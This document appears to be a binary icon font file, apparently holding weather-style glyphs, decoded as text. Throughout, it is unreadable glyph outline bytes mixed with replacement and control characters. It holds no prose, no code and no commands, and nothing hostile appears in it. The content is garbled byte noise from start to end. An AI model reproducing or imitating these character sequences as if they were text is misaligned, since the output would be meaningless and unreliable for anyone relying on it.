<T/:pP	O1B^^B1O.R=#1)eH`��� #!"&54671<54>32>321`*6^B��B^6*#=R.7^/Hg�O1B^^B1O.R=#1)eH`���!I^m}��1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<3	@		@	Y.-
�		

�
-
.`���&:IYhw1#!"&5467<54>321>32'<54&#">321"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.`���!Wu1.54632>321#!"&5467%>7>7#"&5467.#"3!2654&'.'9'9.#".'.54673:3�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�	Pp:/T<

E-5KK5-F
�+		T<
^>

#=R.O1B^^B1O%@

$/JIg`���4Q1#!"&5467<54>32.5467>73267'>7*#"&5<5>321)*6^B��B^6*#=R.3L9		T<
Ig*6

/1p@%O1B^^B1O.R=#

>^
<T		+gIJ/$

`��"DSbq��3!2654&'14654&#".#"9%#!"&54671<54>32>329"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��	
	
`	
	
`	
	
`	
	
`	
	
�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH��	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��!0?N]l#!"&54671<54>32>329"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#`*6^B��B^6*#=R.7^/Hg��	
	
`	
	
`	
	
`	
	
`	
	
�O1B^^B1O.R=#1)eH��	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��!I^m|�������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�P	
	
`	
	
`	
	
`	
	
`	
	
`	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	 	@		@	Y.-
�		

�
-
.`���&:IYhw1#!"&5467<54>321>32'<54&#">321"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.`��"Xv�����9.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:3"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�A	
	
`	
	
`	
	
`	
	
`	
	
�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`��5Rap��9#!"&5467<54>32.5467>33267'>7*#"&5<5>321"326=4&#"326=4&#7"326=4&#"326=4&#7"326=4&#)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�A	
	
`	
	
`	
	
`	
	
`	
	
pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

�	@		@	@	@		@	@	@		@	@	@		@	@	@		@	`����"DQ^kx�3!2654&'14654&#".#"9%#!"&54671<54>32>329"32654&#"32654&#7"32654&#"32654&#7"32654&#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��



`



�



`



`



�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH��



`



`



`



`



`����!.;HUb#!"&54671<54>32>329"32654&#"32654&#7"32654&#"32654&#7"32654&#`*6^B��B^6*#=R.7^/Hg��



`



�



`



`



�O1B^^B1O.R=#1)eH��



`



`



`



`



`����!I^kx�������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32"32654&#"32654&#7"32654&#"32654&#7"32654&#"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�@



`



�



`



`



p	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��



`



`



`



`



@	@		@	Y.-
�		

�
-
.`����'<K[jy�����9#!"&5467<54>321>32'<54&#">329"326=4&#.2?64'14&+";265%2764/&"32654&#"32654&#7"32654&#"32654&#7"32654&##*6^B��B^6*#=R.
U5IgT<*D3/(�	
	
�
.
.Z	@		@
��.
.
Y



`



�



`



`



yF(O1B^^B1O.R=#-8gI<T,#'
	3	@		@	Y.-
�		

�
-
.�



`



`



`



`



`����!Wu�����1.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:3"32654&#"32654&#7"32654&#"32654&#7"32654&#�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�1



`



�



`



`



�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg��



`



`



`



`



`����5R_ly��9#!"&5467<54>32.5467>33267'>7*#"&5<5>321"32654&#"32654&#7"32654&#"32654&#7"32654&#)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�1



`



�



`



`



pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

��



`



`



`



`



`����.R37#737#7##"&54671.54632>321#32654&'1.#".#"1;7"Q�/RI}1>`p0�Tl5K9*pP8[4<T)8K5��B^6*gH/^7.R=#*6^B�Q� ��@`��K5-F
	Pp:/T<

E-5K ^B1OHe)1#=R.O1B^��`����+37#7332654&'1.#".#"1;7"Q�/RI}1�B^6*gH/^7.R=#*6^B�Q� ��`^B1OHe)1#=R.O1B^��`����.Xm|���7#37#32654&'14654&#".#"1;733#"&5467<54>321>321+7<54&#">329"326=4&#.2?64'14&+";265%2764/&"1}IR/�Q>�5K8)T<4[8Pp*9K5lT�0p��B^6*#=R.
U5Ig#*6^B��QOT<*D3/(�	
	
�
.
.Z	@		@
��.
.
 ����@K5-E

<T/:pP	
F-5K�^B1O.R=#-8gIF(O1B^���<T,#'
	3	@		@	Y.-
�		

�
-
.`����1FUet�7#37##"&5467<54>321>321+7<54&#">329"326=4&#.2?64'14&+";265%2764/&"1}IR/�Qq�B^6*#=R.
U5Ig#*6^B��QOT<*D3/(�	
	
�
.
.Z	@		@
��.
.
 ����`^B1O.R=#-8gIF(O1B^���<T,#'
	3	@		@	Y.-
�		

�
-
.`����.f�7#37#32654&'14654&#".#"1;733#"&5467<54>32.5467>732671+7>7*#"&5<5>329"1}IR/�Q>�5K8)T<4[8Pp*9K5lT�0p��B^6*#=R.3L9		T<
*6^B��Q^Ig*6

/1 ����@K5-E

<T/:pP	
F-5K�^B1O.R=#

>^
<T		+@%O1B^���gIJ/$

`����?]7#37##"&5467<54>32.5467>732671+7>7*#"&5<5>329"1}IR/�Qq�B^6*#=R.3L9		T<
*6^B��Q^Ig*6

/1 ����`^B1O.R=#

>^
<T		+@%O1B^���gIJ/$

`����"D[s�3!2654&'14654&#".#"9%#!"&54671<54>32>3294&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg`K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH�-5KK5(88((8 K5 (88(%%% 8(�%%


 %`����!8Pl#!"&54671<54>32>3294&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21`*6^B��B^6*#=R.7^/Hg`K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%�O1B^^B1O.R=#1)eH�-5KK5(88((8 K5 (88(%%% 8(�%%


 %`����!CP]jw��3!2654&'14654&#".#"1%#!"&54671<54>32>329132654&104610#"&5132654&104610#"&57132654&104610#"&5�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��(()'PP 00�(()'PP 00�(()'PP 00�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH�2*,"YY!::!*,"YY!::*,"YY!::`���� -:G#!"&54671<54>32>3214610#"&54610#"&574610#"&5`*6^B��B^6*#=R.7^/Hg��PP')((�PP')((�PP')((�O1B^^B1O.R=#1)eH�2"YY",* "YY",* "YY",*
`����!I^kx��������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32132654&104610#"&5132654&104610#"&57132654&104610#"&5"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T��(()'PP 00�(()'PP 00�(()'PP 00P	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��*,"YY!::!*,"YY!::*,"YY!::�	@		@	Y.-
�		

�
-
.	`����&:GTap���1#!"&5467<54>321>32'<54&#">3214610#"&54610#"&574610#"&5"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(��PP')((�PP')((�PP')((0	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	��"YY",* "YY",* "YY",*�	@		@	Y.-
�		

�
-
.	`����!Wu������1.54632>321#!"&5467%>7>7#"&5467.#"3!2654&'.'9'9.#".'.54673:3132654&104610#"&5132654&104610#"&57132654&104610#"&5�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI��(()'PP 00�(()'PP 00�(()'PP 00�	Pp:/T<

E-5KK5-F
�+		T<
^>

#=R.O1B^^B1O%@

$/JIg��*,"YY!::!*,"YY!::*,"YY!::`����4Q^kx1#!"&5467<54>32.5467>73267'>7*#"&5<5>3214610#"&54610#"&574610#"&5)*6^B��B^6*#=R.3L9		T<
Ig*6

/1��PP')((�PP')((�PP')((p@%O1B^^B1O.R=#

>^
<T		+gIJ/$

��"YY",* "YY",* "YY",*`����!Cs��3!2654&'14654&#".#"1%#!"&54671<54>32>32954&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�
	


	

a
	


	

�
	


	

�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH�y$		$
$		$
$		$
$		$
2$		$
$		$
`���� P��#!"&54671<54>32>32154&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.`*6^B��B^6*#=R.7^/Hg�
	


	

a
	


	

�
	


	

�O1B^^B1O.R=#1)eH�y$		$
$		$
$		$
$		$
2$		$
$		$

`����!I^����
+1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>3254&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'."326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�`
	


	

a
	


	

�
	


	

1	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��$		$
$		$
$		$
$		$
2$		$
$		$
b	@		@	Y.-
�		

�
-
.	`����&:j�����1#!"&5467<54>321>32'<54&#">32154&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'."326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�`
	


	

a
	


	

�
	


	

1	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	��$		$
$		$
$		$
$		$
2$		$
$		$
b	@		@	Y.-
�		

�
-
.`����!Wu��1.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:354&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�Q
	


	

a
	


	

�
	


	

�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg��$		$
$		$
$		$
$		$
2$		$
$		$
`����4P���1#!"&5467<54>32.5467>33267'>7*#"&5<5>3254&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�Q
	


	

a
	


	

�
	


	

pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

��$		$
$		$
$		$
$		$
2$		$
$		$
`@� X��%#"3!2654&+4&#".#"732654&'14654&#".#"11>7<14632>329.5467<54>32>71<14632>321++#!"&5467932654&+4&#".#"1#"1>329	%
!%�	�5K8)T<4[8Pp*9$	8('
 1
��")6*#=R.9	8('
 1
(/!	
*6^B�/!�!/�%
!%	/)G�%%	
K5-E

<T/:pP	
F-$;(8$'G+1O.R=#(8$-!/'O1B^!//!�%%			#`@� Ty%#!"&54671<14632>327132654&'1.#".#"1>71>32:329>54&'1.#".#"01>321�(/!�!/%8('
 1
*�B^6*gH/^7.R=#*6G/+%=\(
1 
'(8

*?f�-!//!,(8$
1 ^B1OHe)1#=R.O1"<-=&+)-$8(			D6`���Bd5463232+#"&=#"&5463'3!2654&'14654&#".#"9%#!"&54671<54>32>329	
P
	P	
P
	�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�P
	P	
P
	P	
=
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH`���A#";326=32654&+54&#"%#!"&54671<54>32>329P	
P
	P	
P
	`*6^B��B^6*#=R.7^/Hg�
	P	
P
	P	
O1B^^B1O.R=#1)eH`���"DS3!2654&'14654&#".#"9%#!"&54671<54>32>329";2654&+�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�P	
�	
��
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eHS
	
	`���!0#!"&54671<54>32>329";2654&+`*6^B��B^6*#=R.7^/Hg�P	
�	
��O1B^^B1O.R=#1)eHS
	
	`���"DS`3!2654&'14654&#".#"9%#!"&54671<54>32>329%"326=4&#"&54632#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��	
	
	
	
�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH-	�		�	�
	
	`���.=12654&#"%#!"&54671<54>32>329%"326=4&#
	
	W*6^B��B^6*#=R.7^/Hg��	
	
	
	
�O1B^^B1O.R=#1)eH-	�		�	
`���=EOX`ow���<54671<5<51045465>32>321#!"&'.5<517!4&'!1!>7!1!.''3.#"1!.'!*'9%3.#"!645<'1!.'"#!*'13!267!`6*&<M,7^/Hg*6Z<��=Y  �����L��66KU��j�..��\�m
�
�@, ,�641O*J71)eHO1:OO:(		@		 _	`?		�	`���!(1:DMU>5!!1!.'>321!>7!'.#"1!>71!4671!>7!1!>7#!"&'���Z
	��	�/4��:*:  :
�|��a�	��	�3��1��1  		�
	 `	@@		@�`@�@CKU^fu}��������%1#!"&'.5<5<5467<5<50454651>321>321%!4&'!1!>7!1!.''3.#"1!.'!*'9%3.#"!645<'1!.'"#!*'13!267!<54&#">329"326=4&#.2?64'14&+";265%2764/&�Z<��=Y6*&<M,
U5Ig#*6�� �����L��66KU��j�..��\�m
�
�@, ,�6UT<*D3/(�	
	
�
.
.Z	@		@
��.
.
�:OO:1O*J7-8gIF(O1(		@		 _	`?		��<T,#'
	3	@		@	Y.-
�		

�
-
.`@�@	AKU`ir����>71!!1!>5!1!6454&#"1.#"3.'>321.#".'!1!.'!1!4&'!1!.'1!.'1!3!267!"326=4&#.2?64'14&+";265%2764/&cF��Z���7gI5U
 :�	D*<T(/��-�
����i"	 	�  	F	�1 1� �	
	
�
.
.Z	@		@
��.
.
 @	Ig8-	#,T<	

@	@@		�		 �	@		@	Y.-
�		

�
-
.`@� QYclt������%1#!"&'.5<5<5467<5<5<54651>32.5467>332671%!4&'!1!>7!1!.''3.#"1!.'!"&#9%3.#"!645<'1!.'"#!*'13!267!>7*#"&5<5>321�Z<��=Y6*&<M,3L9		T<
*6�� �����L��66KU��j�..��\�m
�
�@, ,�6dIg*6

/1�:OO:1P*J7

>_
;U		,A%O1(@		 _		`?		��gIJ/$

`@� 	U_it}�>71!!1!>5!1!>7>7#"&5467.#"3.54673:31.#".'!1!.'!1!4&'!1!.'1!.'1!3!267!cF��Z���P
<T		9L3 :�6*gI1/��-�
����i"	 	�  	F	�1 1�  @	#		T<
^>


/JIg

@	@@		�		 �p��)<D/?'?1>7#"&5467"3267%4673:3#"&5/?G''II''I7''II''I��
<T		9LgI>^��6*gIJ/<T�4444Hhhhh�hhhhk		U;
_>IgL9+/JIg*6U;NNN�p��)1/?'?#"&5467>332671/?G''II''I7''II''I��^>IgL9		T<
�4444Hhhhh�hhhhk9LgI>_
;U		=NNN`�`,1>7#"&5467"3267%4673:3#"&5�
<T		9LgI>^��6*gIJ/<T�		U;
_>IgL9+/JIg*6U;`�`#"&5467>33267�^>IgL9		T<
�9LgI>_
;U		
�~B�(7FVeu��1"&54632'2654&#"3"326=4&#.2?64'4&+";26564/&"27126=4&#"3'2?64'&"1';2654&+"172764/&"IggIIggI<TT<<TT<			
�
-
.Y	@		@	Y.-
�	
		�
-.Y	@		@	Y.-
gIIggIIg T<<TT<<T�	@		@	Y.-
�			
�
-
.Y	@		@	Y.-
�	
		�
-.	�~B�*9IXhx�2654&#"3"326=4&#.2?64'4&+";26564/&"27126=4&#"3'2?64'&"1';2654&+"172764/&"IggIIggI			
�
-
.Y	@		@	Y.-
�	
		�
-.Y	@		@	Y.-
gIIggIIg�	@		@	Y.-
�			
�
-
.Y	@		@	Y.-
�	
		�
-.��B�/?O_p�";732654&+'#%6454&#"3&4546323"326=4&#1.2?64'14&+";2651!;2654&+"972764/&"1�		�]]�

�pp��gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-

	PP
	``@IggI<TT<@	@		@	Y.-
�			
	
		�
-.��B�!1ARgw#&4546321#'"326=4&#1.2?64'14&+";2651!;2654&+"9";732654&+'#2764/&"1�RgIIgR]]]			
�
-
.Y	@		@	��	@		@			�]]�

�pp�G.-
@IggIPP@	@		@	Y.-
�			
	
		O
	PP
	``'
-.��B�*:J[k�6454&#"3&4546323"326=4&#1.2?64'14&+";2651!;2654&+"972764/&"1"&546;732+'#�gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-
H		�]]�

�pp��IggI<TT<@	@		@	Y.-
�			
	
		�
-.��
	PP
	``��A�
.>O_t6454&#"!"326=4&#1.2?64'94&+";2651!;2654&+"972764/&"1"&546;732+'#�gIIg^�	
	
�
-.Y	@		@	��	@		@	Y.-
G		�]]�

�pp��IggI@	@		@	Y.-
�			
	
		�
-.��
	PP
	``��B�)8GWfv6454&#"3&4546323"326=4&#.2?64'4&+";265!;2654&+"172764/&""13!26514&#�gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-
H		@

@IggI<TT<@	@		@	Y.-
�			
	
		�
-.��
	
	��B�
+:JYi6454&#"!"326=4&#.2?64'4&+";265!;2654&+"172764/&""13!26514&#�gIIg^�			
�
-
.Y	@		@	��	@		@	Y.-
H		@

@IggI@	@		@	Y.-
�			
	
		�
-.��
	
	�@`
,;L.#"3>32"326=4&#.2?64'1!2764/&""13!26514&#!�^<<^!J//J�	
	
�
-.�P.-
H

@

��`7II7*66*	@		@	Y.-

-.�
	
	�@`%4E.#""326=4&#.2?64'1!2764/&""13!26514&#!�^<<^�	
	
�
-.�P.-
H

@

��`7II7	@		@	Y.-

-.�
	
		 `&Mt������20#"&5.#"#"&5<1>32#"&5.#"#"&5<5>32#"&5.#"#"&5<7>3"3!2654&#!4&#">32>51326=4&#"2?64'.1#";2654&#1%2764/&"1h��S		N��aa��N		S��hZ�yI		Dp�TT�pD		Iy�ZM�h?		:_}GG}_:		?h�M�		�		� pgI4T	B'<T
�
	
	�-.
`@		@		�.-
`M��g		a�}II}�a		g��M@Ct�Y		S�m>>m�S		Y�tC@9b�L		F{[44[{F		L�b9�`
	
	�Ig7+'T<! @		@		I.-
�		
	�-.
	 `&Mt������20#"&5.#"#"&5<1>32#"&5.#"#"&5<5>32#"&5.#"#"&5<7>3"3!2654&#!4&#">51326=4&#"2?64'.1#";2654&#1%2764/&"1h��S		N��aa��N		S��hZ�yI		Dp�TT�pD		Iy�ZM�h?		:_}GG}_:		?h�M�		�		� pgI4T.XQJ �
	
	�-.
`@		@		�.-
`M��g		a�}II}�a		g��M@Ct�Y		S�m>>m�S		Y�tC@9b�L		F{[44[{F		L�b9�`
	
	�Ig7+%1! @		@		I.-
�		
	�-.
 �MXbr���24.'54&#"463246324632#"&=4&#"3265463246324631%.#"1>75.#"'.#"1>79!9.'.#".#">79%.#".'1�!/K��d
	d��K/!!//!!//!!/


	%%/!!//!!//!�P)'U8 8U')�#sN!0�0!Ns#��
mI.BIIm
B.@%AsV40		04VsA%%%%%%�@

0		0&%�%%%%%
Wx��xW


Ehb;;bhE

2Q W3�Q23W  �O34&#"14&#"4&#"1#"&=463232654&#"4&#"4&#"4>754632`�/!!//!!//!!/%%	


/!!//!!//!!/K��d	
d��K%%%%%%�@%&0		0

�%%%%%%AsV40		04VsA ��&3@M132654&10132654&10132654&10%4610#"&5%4610#"&54610#"&5 (()'PP@(()'PP�(()'PP00 ��00 `00 P13(hh�13(hh��13(hh�EE�EE��EE ��&4610#"&54610#"&54610#"&5 PP')((@PP')((�PP')((P(hh(31�(hh(31�(hh(31���!132654.104>10#"&5�K55K(0((0( $$CCy2GG2YT;;TYEC00CE+..+���4>10#"&�(0((0(K55KyYT;;TY2GG	(#�4'4BJW�!!.77>7>721!.'!7!4&7!#"&'.'%!>7>2!.'!#"&'.''.10103267>106762103261067>10676&'."'1@`��+Qj���J��]7B,+*��iQ+��K	+,B�5ywk&	


.A,,;
@
;,,A.

	&kwy5.� 
`	 h	�

�	'	�9$7797 

 7977$9'#�4@.10103267>106762103261067>10676&'."'�5ywl&	


.A,,;
@
;+,B-


	&kwz4.!9$7797 

 7977$9�� /?7'?'?'?�((HH((H�''II''I�''II''I��??��??��llll�hhhh��hhhh��00��0�� '?'?'?�''II''I�''II''I��??��??��hhhh��hhhh��00��0@�/Uv9#!"&5467<54>32>32>32#'32654&+>54&#".#">3293!2654&'4654&#".#"1@^B��B^6*#=R.#M2"J-B^+9K5@@(88(	K5.F	+(=)/Hg	�K5 5K8)T<4[8Pp*9@1B^^B1O.R=#.=	$-^B	
E.5K 8((8!5K:+2%"eH	�5KK5-E

<T/:pP	
F-@�#C>54&'>54&#".#">329#!"&5467<54>32>321f3G9+^B-J")D6*Pv	$
^B��B^6*#=R.7^/Hg*6@J3.E
	B^-$	+"
#		kN
$`B^^B1O.R=#1)eHO1��@�,@>7>7#"&5467"7.54673:3";732654&+'r
<T		9L+$ (6*gI�~

�]]�

�ppJ.		U;
_>.MB(/JIg!J
	PP
	``��@�.>7>7#"&5467"7";732654&+'k
<T		9L0'y[��

�]]�

�ppR*		U;
_>0QhNR
	PP
	``��@�,@1>7#"&5467"3267%4673:3#"&5"&546;732+'�
<T		9LgI>^��6*gIJ/<T�

�]]�

�pp�		U;
_>IgL9+/JIg*6U;��
	PP
	``��@�-#"&5467>332671"&546;732+'�_>IgL9		T<
�F

�]]�

�pp�9LgI>_
;U		�
	PP
	```���.J4&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21�K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%5KK5(88((8 K5 (88(%%% 8(�%%


 %`��/L4&#"34632#!!265%4&#"134632#!!2651#1"&5133126514&#!5!29�K55K@%%%� �5K��K55K@%%&���5K�8((8@


�@�(85KK5%%%@K5�5KK5%%%@K5�`(88(


@8(@��2654&#"3PppPPppPpPPppPPp@��#"&54632�pPPppPPp�PppPPpp@��181"3"&5462654&#"3(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��#"&546322654&#"3 5KK5)77) PppPPppPDK55KD--DDpPPppPPp@��1"&54632'"3PppPPppPB^^BpPPppPPp @^BB^@��2654&#"3'463"&5PppPPppP�K55KpPPppPPp�5K�K5@��12#"&5462654&#"3(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��12#"&5462654&#"3%%5KK5PppPPppP@K55KK55K��pPPppPPp@��1"&54632'2654&#"3PppPPppPB^^BB^^BpPPppPPp ^BB^^BB^@��1"&54632'2654&#"3PppPPppP5KK55KK5pPPppPPp@K55KK55K@��1"32654&"&54632#(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��2#"&54632654&#"35KK5%%PppPPppP@K55KK55K��pPPppPPp@��12654&#"72#PppPPppPB^^BpPPppPPp @^BB^@��1"&5463274&#265PppPPpp0K55KpPPppPPp�5K�K5@��1812#2654&"&54632#(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��>32#"&'>54&'2654&#"3�5KK5)77) PppPPppP<K55KD--D��pPPppPPp
`��
/=M]n~���#"&546?>54.#"7.54>322654&#"31"326=4&#1&6?6&'1.?>'96&/&671!?>'.95676&/&977>/.1=/!!/-�Du�YY�uD?l�SS�l?��	
	
�
9
9�\\\\�D\\\\�9
9

#!//!#
��!F%Y�uDDu�Y%F!	B"S�l??l�S"B- 	`		`	FN
O
����
O
N	`�� .>N_o���'!.54>32!>54&'2654&#"31"326=4&#1&6?6&'1.?>'96&/&671!?>'.95676&/&977>/.1=--��
Du�YY�uD
��-	
	
�
9
9�\\\\�D\\\\�9
9
��
#"H&Y�uDDu�Y&H"#
r@	`		`	FN
O
����
O
N` �`)@M%1".54>32'2>54.#"3041#"&5054>12654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P$8((8$%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<�H``(88(``H��%%%%` �`)>Ub%1".54>32'2>54.#"352>54.#"3041#"&5054>12654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I$8((8$%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`7�H``(88(``H��%%%%` �`):G132>54.#"4>32#".5!4&#"103265#4632#"&5`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<�8(``HH``(8�%%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(8$$8(%%%%` �`)>O\12#".54>"32>54.#"32>54.#2#".10>3"32654&#V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%%`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`7�8((8$$ %%%%` �`):G14.#"32>'#".54>32!32>10.#"3#"&54632�Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<� 8(``HH``(8�%%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(8$$8(%%%%` �`)>O\%1".54>32'2>54.#"352>54.#"3"&5463210#52654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`78((8$$ %%%%` �`):G14.#"32>'#".54>32!4&#"10>5##"&54632�Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<��8((8$$ %%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(88(``HH``%%%%` �`)>O\14>32#".732>54.#"332>54.#"!463210.5332654&#"`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`78((8$$ %%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%%� `@"&55555'"32654&#3%5�@@ @�``�``�``�	
	
0`S����
��
�
�
�
-	�			��@�� `@	
 55%5%"32654&#3%5��`��@`��	
	
0`;��
��"�
��	�			��@�q����'Rg9#".'10&'.>7>'%>3210&'.'.>76.714.#"32>5Ag�L=o]G"b*D3%X�99$�7<~UHqK$��Bf�SR�fBAxYL~H-kD'K{2 3A *A1�7`�II�`77`�II�`75+ )e9=mZCM+5X=JYd4+ZSG(%$Nam70[N>+^M2k*J1Jbr;<AG'####q����*?>3210&'.'.>76.714.#"32>5qBf�SR�fBAxYL~H-kD'K{2 3A *A1�7`�II�`77`�II�`7]%$Nam70[N>+^M2k*J1Jbr;<AG'####��`<1"&54632'2654&#"3%"31265326514&+546;26514&+ 5KK55KK5(88((88(`B^
	�	
�K5�		�K55KK55K 8((88((8�^B�0	
0
	�5K
	��`<1"&54632'2654&#"3%"31265326514&+546;26514&+ 5KK55KK5%%%%`B^

�

�8(�

�K55KK55K@%%%%�^B�@



�(8

��`-:G326=4&+";26=4&#"+"&546;21"&54632'2654&#"3@
	^B@B^^B@B^
	K5@5KK5@5K��5KK55KK5(88((88(P	
B^^B��B^^B	
5KK5@5KK5`K55KK55K 8((88((8��`+9G"+"&546;232654&+";2654&#1%9"&54632'2654&#"31@
8(@(88(@(8

^B@B^^B@B^
��5KK55KK5%%%%@
(88(@(88(

B^^B��B^^B
�K55KK55K@%%%%t`��(5	3!26'&"62#!"&7"326=4&#2654&#"3��$5�5#��<		`�S`







���-@@-.""��  9�
�

�
��



t`��'%&"13!26%"&546327#"&=46312���<��#5�5#�Y






�.""��-@@ 



�

�

